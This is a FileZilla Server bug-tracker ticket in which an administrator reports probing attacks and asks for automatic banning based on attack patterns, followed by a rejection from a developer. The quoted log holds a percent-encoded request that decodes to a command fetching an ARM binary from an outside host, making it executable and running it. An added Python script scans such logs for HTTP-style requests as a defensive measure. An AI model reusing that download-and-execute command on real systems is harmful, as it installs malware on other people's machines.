Opened 6 years ago

Closed 6 years ago

#11516 closed Feature request (rejected)

Increase in remote attacks against FileZilla FTP Server - Can better protection be implemented

Reported by: surr34l
Owned by:
Priority: normal
Component: FileZilla Server
Keywords: security attacks protection
Cc:
Component version:
Operating system type: Windows
Operating system version: Windows 10 1709


I've seen an increase in attacks against FileZilla FTP Server installs I'm administering.

While it looks like these attacks are unsuccessful, they are getting annoying, and I'd like to ensure my installs are as protected as possible. They are on high ports, but security by obscurity is not real security, only a deterrent until port scanners come along and information is passed around.

(002024)2/7/2018 8:12:33 AM - (not logged in) (123.249.XXX.XXX)> Connected on port [serverport], sending welcome message...
(002024)2/7/2018 8:12:33 AM - (not logged in) (123.249.XXX.XXX)> GET / HTTP/1.1
(002059)2/12/2018 20:34:06 PM - (not logged in) (> GET /shell?%77%67%65%74%20%2D%50%20%2F%74%6D%70%20%68%74%74%70%3A%2F%2F%68%66%73%2E%6D%68%61%63%6B%65%72%2E%63%63%3A%39%32%37%38%2F%6C%69%6E%75%78%2E%61%72%6D%3B%63%68%6D%6F%64%20%37%37%37%20%2F%74%6D%70%2F%6C%69%6E%75%78%2E%61%72%6D%3B%2F%74%6D%70%2F%6C%69%6E%75%78%2E%61%72%6D HTTP/1.1
(002059)2/12/2018 20:34:06 PM - (not logged in) (104.207.XXX.XXX)> Referer: http://filezilla.server.ip.address:port/shell?%77%67%65%74%20%2D%50%20%2F%74%6D%70%20%68%74%74%70%3A%2F%2F%68%66%73%2E%6D%68%61%63%6B%65%72%2E%63%63%3A%39%32%37%38%2F%6C%69%6E%75%78%2E%61%72%6D%3B%63%68%6D%6F%64%20%37%37%37%20%2F%74%6D%70%2F%6C%69%6E%75%78%2E%61%72%6D%3B%2F%74%6D%70%2F%6C%69%6E%75%78%2E%61%72%6D
(002060)2/12/2018 20:34:06 PM - (not logged in) (104.207.XXX.XXX)> Accept-Language: zh-cn
(002060)2/12/2018 20:34:06 PM - (not logged in) (104.207.XXX.XXX)> Host: filezilla.server.ip.address:port

Manual entry and maintenance of an IP Blacklist is cumbersome and time consuming, as indicated here -

I would like to see an option to automatically implement kick and ban length already configured in settings for specific commands coming in that match attack patterns, even if I have to maintain my own list of patterns.

More complete logs can also be provided upon request, as there are a lot more entries with each attempt mucking up my logs and console.
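
The pattern-list idea requested above, as an added example (not part of the original ticket and not FileZilla code): it scans pre-login log lines for HTTP request text arriving on the FTP control port and lists the source IPs for the IP filter. The log layout is inferred from the lines quoted in the ticket; the rule names, function names, and sample lines are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Assumed layout, inferred from the ticket's log lines:
#   (session)timestamp - (user) (ip)> text
LINE_RE = re.compile(
    r"^\((?P<session>\d+)\)(?P<ts>.+?) - \((?P<user>[^)]*)\) \((?P<ip>[^)]*)\)> (?P<text>.*)$"
)

# Operator-maintained pattern list (hypothetical rule names).
PATTERNS = {
    "http-request": re.compile(r"^(GET|POST|HEAD|PUT|OPTIONS|CONNECT) \S+ HTTP/\d\.\d$"),
    "http-header": re.compile(r"^(Host|Referer|User-Agent|Accept[\w-]*): ", re.I),
}

def scan(lines):
    """Return {ip: [(session, rule, decoded_text), ...]} for pre-login matches."""
    hits = defaultdict(list)
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m or m["user"] != "not logged in":
            continue  # malformed line, or a session that has authenticated
        for rule, rx in PATTERNS.items():
            if rx.search(m["text"]):
                # Percent-decode only for display, so the analyst can read the request.
                hits[m["ip"]].append((m["session"], rule, unquote(m["text"])))
                break
    return dict(hits)

def ban_candidates(hits, min_hits=1):
    """Source IPs with at least min_hits matching lines, sorted for stable output."""
    return sorted(ip for ip, rows in hits.items() if len(rows) >= min_hits)

# Constructed sample lines (documentation IP ranges, harmless payload).
SAMPLE = [
    "(000001)2/7/2018 8:12:33 AM - (not logged in) (203.0.113.7)> Connected on port 2121, sending welcome message...",
    "(000001)2/7/2018 8:12:33 AM - (not logged in) (203.0.113.7)> GET / HTTP/1.1",
    "(000002)2/7/2018 8:13:01 AM - (not logged in) (198.51.100.9)> GET /shell?%65%63%68%6F%20%74%65%73%74 HTTP/1.1",
    "(000002)2/7/2018 8:13:01 AM - (not logged in) (198.51.100.9)> Host: ftp.example.test:2121",
    "(000003)2/7/2018 8:14:10 AM - (not logged in) (192.0.2.44)> USER alice",
    "(000004)2/7/2018 8:15:00 AM - (not logged in) (> GET /x HTTP/1.1",  # IP field missing: skipped
]

if __name__ == "__main__":
    found = scan(SAMPLE)
    for ip in ban_candidates(found):
        for session, rule, text in found[ip]:
            print(f"{ip} session={session} rule={rule} text={text!r}")
```

An ordinary FTP command such as `USER alice` matches no rule, so a legitimate client that has not yet logged in is not flagged.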

Change History (1)

comment:1 by Tim Kosse, 6 years ago

Resolution: rejected
Status: new → closed

You can safely ignore these connections, they are utterly harmless.

In a future version a feature will be added to not show connections from non-logged in users in the log.
